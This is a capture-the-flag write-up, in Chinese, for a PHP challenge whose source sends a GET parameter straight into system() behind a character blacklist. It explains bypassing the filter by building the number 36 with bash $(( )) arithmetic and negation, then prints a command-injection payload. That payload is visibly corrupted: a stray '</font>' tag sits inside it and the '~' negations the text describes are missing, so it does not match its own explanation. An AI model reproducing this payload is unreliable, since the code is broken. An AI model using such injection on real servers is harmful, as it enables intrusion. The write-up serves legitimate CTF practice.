<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){system("cat ".$c.".php");}
}else{highlight_file(__FILE__);
}
过滤了; a-z 0-9``反引号 % \x09 \x26 > <``\x0a``(``{``'``" ````# .,?*-=``[`
可以说过滤的非常完全了,之前的临时文件上传也无法使用了(.和/都给你过滤了),这里没有办法,但是看到flag in 36.php或许是突破口,但是数字不是过滤了吗
利用linux的$(())构造出36
$(())=0
$((~ $(()) ))=-1
(())是用来整数运算的命令,内部可以放表达式,默认相加,通过$((~36)) 可得36取反为-37
综合上述,可以构造payload
:::info
?c=$(($((</font>$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(())))$(($(()))) ))))
:::
payload中标红的地方就是取反,红色里面包含37个$((~$(())))都是-1,默认相加,得到-37后再取反即可得到36
